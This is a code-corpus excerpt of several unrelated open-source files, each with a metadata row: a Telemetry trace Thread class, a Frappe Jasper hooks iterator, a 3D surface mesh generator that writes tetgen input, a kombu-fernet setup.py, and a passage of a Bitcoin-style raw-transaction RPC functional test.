return len(self._open_slices)
def IterChildContainers(self):
return
yield # pylint: disable=unreachable
def IterEventsInThisContainer(self, event_type_predicate, event_predicate):
if event_type_predicate(slice_module.Slice):
for s in self._newly_added_slices:
if event_predicate(s):
yield s
for s in self._all_slices:
if event_predicate(s):
yield s
if event_type_predicate(async_slice_module.AsyncSlice):
for async_slice in self._async_slices:
if event_predicate(async_slice):
yield async_slice
for sub_slice in async_slice.IterEventsInThisContainerRecrusively():
if event_predicate(sub_slice):
yield sub_slice
if event_type_predicate(flow_event_module.FlowEvent):
for flow_event in self._flow_events:
if event_predicate(flow_event):
yield flow_event
if event_type_predicate(sample_module.Sample):
for sample in self._samples:
if event_predicate(sample):
yield sample
def AddSample(self, category, name, timestamp, args=None):
if len(self._samples) and timestamp < self._samples[-1].start:
raise ValueError(
'Samples must be added in increasing timestamp order')
sample = sample_module.Sample(
self, category, name, timestamp, args=args)
self._samples.append(sample)
def AddAsyncSlice(self, async_slice):
self._async_slices.append(async_slice)
def AddFlowEvent(self, flow_event):
self._flow_events.append(flow_event)
def BeginSlice(self, category, name, timestamp, thread_timestamp=None,
args=None):
"""Opens a new slice for the thread.
    Calls to BeginSlice and EndSlice must be made with
    monotonically non-decreasing timestamps.
* category: Category to which the slice belongs.
* name: Name of the slice to add.
    * timestamp: The timestamp of the slice, in milliseconds.
* thread_timestamp: Thread specific clock (scheduled) timestamp of the
slice, in milliseconds.
    * args: Arguments associated with the slice.
    Returns the newly opened slice.
"""
if len(self._open_slices) > 0 and timestamp < self._open_slices[-1].start:
raise ValueError(
'Slices must be added in increasing timestamp order')
new_slice = slice_module.Slice(self, category, name, timestamp,
thread_timestamp=thread_timestamp,
args=args)
self._open_slices.append(new_slice)
new_slice.did_not_finish = True
self.PushSlice(new_slice)
return new_slice
def EndSlice(self, end_timestamp, end_thread_timestamp=None):
""" Ends the last begun slice in this group and pushes it onto the slice
array.
* end_timestamp: Timestamp when the slice ended in milliseconds
* end_thread_timestamp: Timestamp when the scheduled time of the slice ended
in milliseconds
returns completed slice.
"""
if not len(self._open_slices):
raise ValueError(
'EndSlice called without an open slice')
curr_slice = self._open_slices.pop()
if end_timestamp < curr_slice.start:
raise ValueError(
'Slice %s end time is before its start.' % curr_slice.name)
curr_slice.duration = end_timestamp - curr_slice.start
# On Windows, it is possible to have a value for |end_thread_timestamp|
# but not for |curr_slice.thread_start|, because it takes some time to
# initialize the thread time timer.
if curr_slice.thread_start != None and end_thread_timestamp != None:
curr_slice.thread_duration = (end_thread_timestamp -
curr_slice.thread_start)
curr_slice.did_not_finish = False
return curr_slice
def PushCompleteSlice(self, category, name, timestamp, duration,
thread_timestamp, thread_duration, args=None):
new_slice = slice_module.Slice(self, category, name, timestamp,
thread_timestamp=thread_timestamp,
args=args)
if duration is None:
new_slice.did_not_finish = True
else:
new_slice.duration = duration
new_slice.thread_duration = thread_duration
self.PushSlice(new_slice)
return new_slice
def PushMarkSlice(
self, category, name, timestamp, thread_timestamp, args=None):
new_slice = slice_module.Slice(self, category, name, timestamp,
thread_timestamp=thread_timestamp,
args=args)
self.PushSlice(new_slice)
return new_slice
def PushSlice(self, new_slice):
self._newly_added_slices.append(new_slice)
return new_slice
def AutoCloseOpenSlices(self, max_timestamp, max_thread_timestamp):
for s in self._newly_added_slices:
if s.did_not_finish:
s.duration = max_timestamp - s.start
assert s.duration >= 0
if s.thread_start != None:
s.thread_duration = max_thread_timestamp - s.thread_start
assert s.thread_duration >= 0
self._open_slices = []
def IsTimestampValidForBeginOrEnd(self, timestamp):
if not len(self._open_slices):
return True
return timestamp >= self._open_slices[-1].start
def FinalizeImport(self):
self._BuildSliceSubRows()
def _BuildSliceSubRows(self):
"""This function works by walking through slices by start time.
The basic idea here is to insert each slice as deep into the subrow
list as it can go such that every subslice is fully contained by its
parent slice.
Visually, if we start with this:
0: [ a ]
1: [ b ]
2: [c][d]
To place this slice:
[e]
    We first check row 2's last item, [d]. [e] won't fit into [d] (they don't
    even intersect). So we go to row 1. That gives us [b], and [e] won't fit
    into that either. So, we go to row 0 and its last slice, [a]. That can
completely contain [e], so that means we should add [e] as a subslice
of [a]. That puts it on row 1, yielding:
0: [ a ]
1: [ b ][e]
2: [c][d]
If we then get this slice:
[f]
We do the same deepest-to-shallowest walk of the subrows trying to fit
it. This time, it doesn't fit in any open slice. So, we simply append
it to row 0 (a root slice):
0: [ a ] [f]
1: [ b ][e]
"""
def CompareSlices(s1, s2):
if s1.start == s2.start:
# Break ties by having the slice with the greatest
# end timestamp come first.
return cmp(s2.end, s1.end)
return cmp(s1.start, s2.start)
assert len(self._toplevel_slices) == 0
assert len(self._all_slices) == 0
if not len(self._newly_added_slices):
return
self._all_slices.extend(self._newly_added_slices)
sorted_slices = sorted(self._newly_added_slices, cmp=CompareSlices)
root_slice = sorted_slices[0]
self._toplevel_slices.append(root_slice)
for s in sorted_slices[1:]:
if not self._AddSliceIfBounds(root_slice, s):
root_slice = s
self._toplevel_slices.append(root_slice)
self._newly_added_slices = []
def _AddSliceIfBounds(self, root, child):
"""Adds a child slice to a root slice its proper row.
Return False if the child slice is not in the bounds
of the root slice.
Because we know that the start time of child is >= the start time
of all other slices seen so far, we can just check the last slice
of each row for bounding.
"""
# The source trace data is in microseconds but we store it as milliseconds
# in floating-point. Since we can't represent micros as millis perfectly,
# two end=start+duration combos that should be the same will be slightly
# different. Round back to micros to ensure equality below.
child_end_micros = round(child.end * 1000)
root_end_micros = round(root.end * 1000)
if child.start >= root.start and child_end_micros <= root_end_micros:
if len(root.sub_slices) > 0:
if self._AddSliceIfBounds(root.sub_slices[-1], child):
return True
child.parent_slice = root
root.AddSubSlice(child)
return True
return False
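# Illustrative use (assumes a parent process object from telemetry.timeline;
# timestamps are in milliseconds):
#   thread = Thread(process, tid=1)
#   thread.BeginSlice('cat', 'outer', 10)
#   thread.BeginSlice('cat', 'inner', 12)
#   thread.EndSlice(14)
#   thread.EndSlice(20)
#   thread.FinalizeImport()  # organizes 'inner' as a sub-slice of 'outer'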
| bsd-3-clause | -2,363,025,247,585,198,600 | 35.514925 | 80 | 0.647456 | false | 3.912835 | false | false | false |
saguas/jasper_erpnext_report | jasper_erpnext_report/utils/jasper_iter_hooks.py | 1 | 1437 | from __future__ import unicode_literals
__author__ = 'luissaguas'
import frappe
from frappe import _
"""
HOOKS:
jasper_after_sendmail(data, url, file_name, file_path); jasper_before_sendmail(data, file_name, output, url, **kargs);
jasper_after_get_report(file_name, file_output, url, filepath); jasper_before_get_report(data);
jasper_after_list_for_doctype(doctype, docnames, report, lista); jasper_before_list_for_doctype(doctype, docnames, report);
jasper_after_list_for_all(lista); jasper_before_list_for_all();
jasper_scriptlet(JavaScriptlet, ids=None, data=None, cols=None, doctype=None, docname=None);
"""
class JasperHooks:
def __init__(self, hook_name, docname=None, fallback=None):
self.hook_name = hook_name
self.current = 0
self.methods = frappe.get_hooks().get(self.hook_name) or (fallback if fallback is not None else [])
if isinstance(self.methods, dict):
if docname in self.methods.keys():
self.methods = self.methods[docname]
else:
self.methods = fallback if fallback is not None else []
self.methods_len = len(self.methods)
def __iter__(self):
return self
def next(self):
if self.current >= self.methods_len:
raise StopIteration
else:
return self.get_next_jasper_hook_method()
def get_next_jasper_hook_method(self):
if self.methods_len > 0:
curr_method = frappe.get_attr(self.methods[self.current])
self.current += 1
return curr_method
return None
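# Usage sketch (illustrative, not part of the original module): iterate every
# registered implementation of one of the hooks listed above and call it.
#
#   for method in JasperHooks("jasper_after_sendmail"):
#       method(data, url, file_name, file_path)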
| mit | 6,848,915,279,601,715,000 | 30.933333 | 125 | 0.712596 | false | 2.932653 | false | false | false |
tbtraltaa/medianshape | medianshape/simplicial/surfgen.py | 1 | 10038 | # encoding: utf-8
'''
2D surface embedded in 3D
-------------------------
'''
from __future__ import absolute_import
import importlib
import os
import numpy as np
from medianshape.simplicial import pointgen3d, mesh, utils
from medianshape.simplicial.meshgen import meshgen2d
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
from medianshape.viz import plot2d, plot3d
from distmesh.plotting import axes_simpplot3d
from medianshape.simplicial.utils import boundary_points
def func(x, y, sign=1):
'''
:math:`\sin\pi x \cos \pi y`.
'''
return np.sin(np.pi*x)*np.cos(np.pi*y)
def sample_surf(scale, step=0.2):
'''
Returns a tuple X, Y, Z of a surface for an experiment.
'''
x = y = np.arange(-4.0, 4.0, step)
X, Y = np.meshgrid(x, y)
from matplotlib.mlab import bivariate_normal
'''
Z1 = bivariate_normal(X, Y, 1.0, 1.0, 0.0, 0.0)
Z2 = bivariate_normal(X, Y, 1.5, 0.5, 1, 1)
#Z3 = bivariate_normal(X, Y, 1, 1, -2, -2)
Z = Z2 - Z1
'''
# Ups
ZU1 = bivariate_normal(X,Y, 1.5, 1, 0,-2)
ZU2 = bivariate_normal(X, Y, 1.5, 1.5, 4, 1)
ZU3 = bivariate_normal(X, Y, 1, 1, -4, 1)
#ZU4 = bivariate_normal(X, Y, 1.5, 1.5, -4, -4)
#ZU5 = bivariate_normal(X, Y, 1, 1, 4, -4)
ZU4 = bivariate_normal(X, Y, 4, 0.5, 0, -4)
# Downs
ZD1 = bivariate_normal(X, Y, 1.5, 1, 0, 1)
ZD2 = bivariate_normal(X, Y, 1.5, 1.5, -4, -2)
ZD3 = bivariate_normal(X, Y, 1, 1, 4, -2)
ZD4 = bivariate_normal(X, Y, 4, 1, 0, 4)
Z1 = ZU1 + ZU2 + ZU3 - ZD1 - ZD2 - ZD3 - ZD4
Zmax1 = np.abs(np.amax(Z1))
Z1 = Z1/Zmax1 * scale[2]
# Visualization
fig = plt.figure()
ax = fig.gca(projection="3d")
surf = ax.plot_surface(X, Y, Z1, rstride=1, cstride=1, cmap=cm.winter,
linewidth=0, antialiased=False)
plt.show()
# Ups
ZU1 = bivariate_normal(X,Y, 2, 1, 1,1)
ZU2 = bivariate_normal(X, Y, 3, 1, -2, 4)
ZU3 = bivariate_normal(X, Y, 1.5, 1.5, -2, -2)
#ZU4 = bivariate_normal(X, Y, 1.5, 1.5, -4, -4)
#ZU5 = bivariate_normal(X, Y, 1, 1, 4, -4)
ZU4 = bivariate_normal(X, Y, 2, 2, 3, -4)
# Downs
ZD1 = bivariate_normal(X, Y, 1, 2, 4, 2)
ZD2 = bivariate_normal(X, Y, 1.5, 1.5, -2, 2)
ZD3 = bivariate_normal(X, Y, 1.5, 1.5, 1, -2)
ZD4 = bivariate_normal(X, Y, 4, 1, 0, -4)
Z2 = ZU1 + ZU2 + ZU3 - ZD1 - ZD2 - ZD3 - ZD4
Zmax2 = np.abs(np.amax(Z2))
Z2 = Z2/Zmax2 * scale[2]
X = X * scale[0]/4.0
Y = Y * scale[1]/4.0
# Visualization
fig = plt.figure()
ax = fig.gca(projection="3d")
surf = ax.plot_surface(X, Y, Z2, rstride=1, cstride=1, cmap=cm.winter,
linewidth=0, antialiased=False)
plt.show()
return X, Y, Z1, Z2
def interpolate_surf(points, values, ipoints, method = "nearest"):
from scipy.interpolate import griddata
'''
Used to interpolate a sample surface to a surface in a mesh.
'''
return griddata(points, values, ipoints, method= method)
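# e.g. (illustrative): given scattered sample points and the vertices of a 2D
# mesh, interpolate_surf(sample_points, Z_samples.reshape(-1, 1), mesh.points)
# yields one interpolated height per mesh vertex (nearest-neighbour by default),
# which is how it is used in surfgen_shared_boundary() below.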
def surfgen_shared_boundary(bbox=[-10,-10,-10, 10,10,10], l=3):
'''
Generates two surfaces in 3D with shared boundary for an experiment.
    Writes the two surfaces as a .poly file for tetgen.
'''
# Generating point grids for two surfaces
xmin = bbox[0]
xmax = bbox[3]
ymin = bbox[1]
ymax = bbox[4]
zmin = bbox[2]
zmax = bbox[5]
Xmin, Ymin, Zmin, Xmax, Ymax, Zmax = np.array(bbox)*0.8
X, Y, Z1, Z2 = sample_surf([Xmax, Ymax, zmax*0.3], step=0.8)
Z1 = Z1 + zmax*0.4
Z2 = Z2 - zmax*0.4
#Symmertic surfs
#Z2 = -Z1 - zmax*0.4
'''
# Plotting the two surfaces
fig = plt.figure()
ax = fig.gca(projection="3d")
surf = ax.scatter(X, Y, Z1.reshape(-1,1), color='b')
surf = ax.scatter(X, Y, Z2.reshape(-1,1), color='r')
plt.show()
'''
mesh = meshgen2d([Xmin, Ymin, Xmax, Ymax], l, include_corners=True)
sample_points = np.hstack((X.reshape(-1,1), Y.reshape(-1,1)))
# Interpolating the surface mesh into two different surfaces
# similar to the the sample surfaces generated before
Z1 = interpolate_surf(sample_points, Z1.reshape(-1,1), mesh.points)
Z2 = interpolate_surf(sample_points, Z2.reshape(-1,1), mesh.points)
# Integrating two surfaces
points1 = np.hstack((mesh.points, Z1))
print points1.shape
points2 = np.hstack((mesh.points, Z2))
print points2.shape
corners = utils.boundary_points(bbox)
midcorners = utils.mid_corners(bbox)
offset1 = len(corners) +len(midcorners) + 1
offset2 = len(corners) + len(midcorners) + len(points1) + 1
points = np.concatenate((corners, midcorners, points1, points2), axis=0)
print points.shape
triangles1 = mesh.simplices + offset1
triangles2 = mesh.simplices + offset2
    # Adding the indices of the points as the last column of the coordinate list
Xmin_s1 = np.argwhere(points1[:,0]==Xmin)
Xmin_s1_points = np.hstack((points1[Xmin_s1.reshape(-1,)], Xmin_s1))
# Sorting the indices such that the points are in increasing order of its y-component
Xmin_s1 = (Xmin_s1_points[:,3][np.argsort(Xmin_s1_points[:,1])] + offset1).astype(int)
Xmin_s2 = np.argwhere(points2[:,0]==Xmin)
Xmin_s2_points = np.hstack((points2[Xmin_s2.reshape(-1,)], Xmin_s2))
Xmin_s2 = (Xmin_s2_points[:,3][np.argsort(Xmin_s2_points[:,1])] + offset2).astype(int)
Xmax_s1 = np.argwhere(points1[:,0]==Xmax)
Xmax_s1_points = np.hstack((points1[Xmax_s1.reshape(-1,)], Xmax_s1))
Xmax_s1 = (Xmax_s1_points[:,3][np.argsort(Xmax_s1_points[:,1])] + offset1).astype(int)
Xmax_s2 = np.argwhere(points2[:,0]==Xmax)
Xmax_s2_points = np.hstack((points2[Xmax_s2.reshape(-1,)], Xmax_s2))
Xmax_s2 = (Xmax_s2_points[:,3][np.argsort(Xmax_s2_points[:,1])] + offset2).astype(int)
Ymin_s1 = np.argwhere(points1[:,1]==Ymin)
Ymin_s1_points = np.hstack((points1[Ymin_s1.reshape(-1,)], Ymin_s1))
Ymin_s1 = (Ymin_s1_points[:,3][np.argsort(Ymin_s1_points[:,0])] + offset1).astype(int)
Ymin_s2 = np.argwhere(points2[:,1]==Ymin)
Ymin_s2_points = np.hstack((points2[Ymin_s2.reshape(-1,)], Ymin_s2))
Ymin_s2 = (Ymin_s2_points[:,3][np.argsort(Ymin_s2_points[:,0])] + offset2).astype(int)
Ymax_s1 = np.argwhere(points1[:,1]==Ymax)
Ymax_s1_points = np.hstack((points1[Ymax_s1.reshape(-1,)], Ymax_s1))
Ymax_s1 = (Ymax_s1_points[:,3][np.argsort(Ymax_s1_points[:,0])] + offset1).astype(int)
Ymax_s2 = np.argwhere(points2[:,1]==Ymax)
Ymax_s2_points = np.hstack((points2[Ymax_s2.reshape(-1,)], Ymax_s2))
Ymax_s2 = (Ymax_s2_points[:,3][np.argsort(Ymax_s2_points[:,0])] + offset2).astype(int)
for i in range(len(Xmin_s1)-1):
triangles1 = np.vstack((triangles1, [9, Xmin_s1[i], Xmin_s1[i+1]]))
triangles1 = np.vstack((triangles1, [9, Xmin_s1[-1], 12]))
for i in range(len(Xmin_s2)-1):
triangles2 = np.vstack((triangles2, [9, Xmin_s2[i], Xmin_s2[i+1]]))
triangles2 = np.vstack((triangles2, [9, Xmin_s2[-1], 12]))
for i in range(len(Xmax_s1)-1):
triangles1 = np.vstack((triangles1, [10, Xmax_s1[i], Xmax_s1[i+1]]))
triangles1 = np.vstack((triangles1, [10, Xmax_s1[-1], 11]))
for i in range(len(Xmax_s2)-1):
triangles2 = np.vstack((triangles2, [10, Xmax_s2[i], Xmax_s2[i+1]]))
triangles2 = np.vstack((triangles2, [10, Xmax_s2[-1], 11]))
for i in range(len(Ymin_s1)-1):
triangles1 = np.vstack((triangles1, [9, Ymin_s1[i], Ymin_s1[i+1]]))
triangles1 = np.vstack((triangles1, [9, Ymin_s1[-1], 10]))
for i in range(len(Ymin_s2)-1):
triangles2 = np.vstack((triangles2, [9, Ymin_s2[i], Ymin_s2[i+1]]))
triangles2 = np.vstack((triangles2, [9, Ymin_s2[-1], 10]))
for i in range(len(Ymax_s1)-1):
triangles1 = np.vstack((triangles1, [12, Ymax_s1[i], Ymax_s1[i+1]]))
triangles1 = np.vstack((triangles1, [12, Ymax_s1[-1], 11]))
for i in range(len(Ymax_s2)-1):
triangles2 = np.vstack((triangles2, [12, Ymax_s2[i], Ymax_s2[i+1]]))
triangles2 = np.vstack((triangles2, [12, Ymax_s2[-1], 11]))
triangles = np.vstack((triangles1, triangles2))
# Preparing PLC and save it to .poly file for tetgen
with open( os.environ['HOME'] +'/mediansurf.poly', 'w') as f:
f.write("#Part 1 - the node list\n")
f.write("#%d nodes in 3d, no attributes, no boundary marker\n"%points.shape[0])
f.write('%d %d %d %d\n'%(points.shape[0], 3, 0,0))
for i, p in enumerate(points):
f.write("%d %f %f %f\n"%(i+1, p[0], p[1], p[2]))
# Each 4 sides has 3 polygons
# Top and bottom
# Each triangle of the two surfaces are facets
fn = 6 + len(triangles)
f.write("#Part 2 - the facet list.\n")
f.write("#%d facets with boundary markers\n"%fn)
f.write('%d %d\n'%(fn, 1))
f.write("#Boundary facet list.\n")
f.write("%d %d %d\n"%(1, 0, 1))
f.write("4 1 2 3 4\n")
f.write("%d %d %d\n"%(1, 0, 1))
f.write("4 5 6 7 8\n")
#xmin side
f.write("2 0 1\n")
f.write("4 1 4 8 5\n")
f.write("2 9 12\n")
#ymin side
f.write("2 0 1\n")
f.write("4 1 2 6 5\n")
f.write("2 9 10\n")
#xmax side
f.write("2 0 1\n")
f.write("4 2 3 7 6\n")
f.write("2 10 11\n")
#ymax side
f.write("2 0 1\n")
f.write("4 3 4 8 7\n")
f.write("2 11 12\n")
f.write("#Facet list of surface1.\n")
for t in triangles1:
f.write("%d %d %d\n"%(1, 0, -1))
f.write("%d %d %d %d\n"%(3, t[0], t[1], t[2]))
f.write("#Facet list of surface2.\n")
for t in triangles2:
f.write("%d %d %d\n"%(1, 0, -2))
f.write("%d %d %d %d\n"%(3, t[0], t[1], t[2]))
f.write("#Part 3 - the hole list.\n")
f.write('%d\n'%0)
f.write("#Part 4 - the region list.\n")
f.write('%d\n'%0)
if __name__ == "__main__":
surfgen_shared_boundary()
| gpl-3.0 | -5,031,703,206,285,976,000 | 37.1673 | 90 | 0.5789 | false | 2.551601 | false | false | false |
alex/kombu-fernet-serializers | setup.py | 1 | 1648 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import kombu_fernet
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
packages = [
'kombu_fernet',
'kombu_fernet.serializers',
]
requires = [
'anyjson>=0.3.3',
'kombu>=3.0.16',
]
with open('README.rst') as f:
readme = f.read()
with open('LICENSE') as f:
license = f.read()
setup(
name='kombu-fernet-serializers',
version=kombu_fernet.__version__,
description='Symmetrically encrypted serializers for Kombu',
long_description=readme,
author='David Gouldin',
author_email='[email protected]',
url='https://github.com/heroku/kombu-fernet-serializers',
packages=packages,
package_data={'': ['LICENSE']},
include_package_data=True,
install_requires=requires,
license=license,
zip_safe=False,
classifiers=(
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
),
entry_points={
'kombu.serializers': [
'fernet_json = kombu_fernet.serializers.json:register_args',
'fernet_yaml = kombu_fernet.serializers.yaml:register_args',
'fernet_pickle = kombu_fernet.serializers.pickle:register_args',
'fernet_msgpack = kombu_fernet.serializers.msgpack:register_args',
]
}
)
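# Note (illustrative, not part of the original setup script): once installed,
# the entry points above register the serializers with kombu, so they can be
# selected by name like any built-in serializer, e.g.
#   producer.publish(payload, serializer='fernet_json')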
| mit | 423,783,469,457,479,940 | 25.580645 | 78 | 0.633495 | false | 3.419087 | false | false | false |
globaltoken/globaltoken | test/functional/rpc_rawtransaction.py | 1 | 18199 | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the rawtransaction RPCs.
Test the following RPCs:
- createrawtransaction
- signrawtransactionwithwallet
- sendrawtransaction
- decoderawtransaction
- getrawtransaction
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class multidict(dict):
"""Dictionary that allows duplicate keys.
Constructed with a list of (key, value) tuples. When dumped by the json module,
will output invalid json with repeated keys, eg:
    >>> json.dumps(multidict([(1,2),(1,2)]))
'{"1": 2, "1": 2}'
Used to test calls to rpc methods with repeated keys in the json object."""
def __init__(self, x):
dict.__init__(self, x)
self.x = x
def items(self):
return self.x
# Create one-input, one-output, no-fee transaction:
class RawTransactionsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [["-addresstype=legacy"], ["-addresstype=legacy"], ["-addresstype=legacy"]]
def setup_network(self, split=False):
super().setup_network()
connect_nodes_bi(self.nodes,0,2)
def run_test(self):
#prepare some coins for multiple *rawtransaction commands
self.nodes[2].generate(1)
self.sync_all()
self.nodes[0].generate(101)
self.sync_all()
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.5)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.0)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),5.0)
self.sync_all()
self.nodes[0].generate(5)
self.sync_all()
# Test getrawtransaction on genesis block coinbase returns an error
block = self.nodes[0].getblock(self.nodes[0].getblockhash(0))
assert_raises_rpc_error(-5, "The genesis block coinbase is not considered an ordinary transaction", self.nodes[0].getrawtransaction, block['merkleroot'])
# Test `createrawtransaction` required parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction)
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [])
# Test `createrawtransaction` invalid extra parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [], {}, 0, False, 'foo')
# Test `createrawtransaction` invalid `inputs`
txid = '1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000'
assert_raises_rpc_error(-3, "Expected type array", self.nodes[0].createrawtransaction, 'foo', {})
assert_raises_rpc_error(-1, "JSON value is not an object as expected", self.nodes[0].createrawtransaction, ['foo'], {})
assert_raises_rpc_error(-8, "txid must be hexadecimal string", self.nodes[0].createrawtransaction, [{}], {})
assert_raises_rpc_error(-8, "txid must be hexadecimal string", self.nodes[0].createrawtransaction, [{'txid': 'foo'}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': txid}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 'foo'}], {})
assert_raises_rpc_error(-8, "Invalid parameter, vout must be positive", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': -1}], {})
assert_raises_rpc_error(-8, "Invalid parameter, sequence number is out of range", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 0, 'sequence': -1}], {})
# Test `createrawtransaction` invalid `outputs`
address = self.nodes[0].getnewaddress()
assert_raises_rpc_error(-3, "Expected type object", self.nodes[0].createrawtransaction, [], 'foo')
assert_raises_rpc_error(-8, "Data must be hexadecimal string", self.nodes[0].createrawtransaction, [], {'data': 'foo'})
assert_raises_rpc_error(-5, "Invalid Bitcoin address", self.nodes[0].createrawtransaction, [], {'foo': 0})
assert_raises_rpc_error(-3, "Invalid amount", self.nodes[0].createrawtransaction, [], {address: 'foo'})
assert_raises_rpc_error(-3, "Amount out of range", self.nodes[0].createrawtransaction, [], {address: -1})
assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)]))
# Test `createrawtransaction` invalid `locktime`
assert_raises_rpc_error(-3, "Expected type number", self.nodes[0].createrawtransaction, [], {}, 'foo')
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, -1)
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, 4294967296)
# Test `createrawtransaction` invalid `replaceable`
assert_raises_rpc_error(-3, "Expected type bool", self.nodes[0].createrawtransaction, [], {}, 0, 'foo')
#########################################
# sendrawtransaction with missing input #
#########################################
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1}] #won't exists
outputs = { self.nodes[0].getnewaddress() : 4.998 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
rawtx = self.nodes[2].signrawtransactionwithwallet(rawtx)
# This will raise an exception since there are missing inputs
assert_raises_rpc_error(-25, "Missing inputs", self.nodes[2].sendrawtransaction, rawtx['hex'])
#####################################
# getrawtransaction with block hash #
#####################################
# make a tx by sending then generate 2 blocks; block1 has the tx in it
tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1)
block1, block2 = self.nodes[2].generate(2)
self.sync_all()
# We should be able to get the raw transaction by providing the correct block
gottx = self.nodes[0].getrawtransaction(tx, True, block1)
assert_equal(gottx['txid'], tx)
assert_equal(gottx['in_active_chain'], True)
# We should not have the 'in_active_chain' flag when we don't provide a block
gottx = self.nodes[0].getrawtransaction(tx, True)
assert_equal(gottx['txid'], tx)
assert 'in_active_chain' not in gottx
# We should not get the tx if we provide an unrelated block
assert_raises_rpc_error(-5, "No such transaction found", self.nodes[0].getrawtransaction, tx, True, block2)
# An invalid block hash should raise the correct errors
assert_raises_rpc_error(-8, "parameter 3 must be hexadecimal", self.nodes[0].getrawtransaction, tx, True, True)
assert_raises_rpc_error(-8, "parameter 3 must be hexadecimal", self.nodes[0].getrawtransaction, tx, True, "foobar")
assert_raises_rpc_error(-8, "parameter 3 must be of length 64", self.nodes[0].getrawtransaction, tx, True, "abcd1234")
assert_raises_rpc_error(-5, "Block hash not found", self.nodes[0].getrawtransaction, tx, True, "0000000000000000000000000000000000000000000000000000000000000000")
# Undo the blocks and check in_active_chain
self.nodes[0].invalidateblock(block1)
gottx = self.nodes[0].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
assert_equal(gottx['in_active_chain'], False)
self.nodes[0].reconsiderblock(block1)
assert_equal(self.nodes[0].getbestblockhash(), block2)
#########################
# RAW TX MULTISIG TESTS #
#########################
# 2of2 test
addr1 = self.nodes[2].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[2].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
# Tests for createmultisig and addmultisigaddress
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, ["01020304"])
self.nodes[0].createmultisig(2, [addr1Obj['pubkey'], addr2Obj['pubkey']]) # createmultisig can only take public keys
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 2, [addr1Obj['pubkey'], addr1]) # addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here.
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr1])['address']
#use balance deltas instead of absolute values
bal = self.nodes[2].getbalance()
# send 1.2 BTC to msig adr
txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal+Decimal('1.20000000')) #node2 has both keys of the 2of2 ms addr., tx should affect the balance
# 2of3 test from different nodes
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr3 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
addr3Obj = self.nodes[2].getaddressinfo(addr3)
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey']])['address']
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
#THIS IS AN INCOMPLETE FEATURE
        #NODE2 HAS TWO OF THREE KEYS AND THE FUNDS SHOULD BE SPENDABLE AND COUNT IN THE BALANCE CALCULATION
assert_equal(self.nodes[2].getbalance(), bal) #for now, assume the funds of a 2of3 multisig tx are not marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = False
for outpoint in rawTx['vout']:
if outpoint['value'] == Decimal('2.20000000'):
vout = outpoint
break
bal = self.nodes[0].getbalance()
inputs = [{ "txid" : txId, "vout" : vout['n'], "scriptPubKey" : vout['scriptPubKey']['hex'], "amount" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxPartialSigned['complete'], False) #node1 only has one key, can't comp. sign the tx
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs)
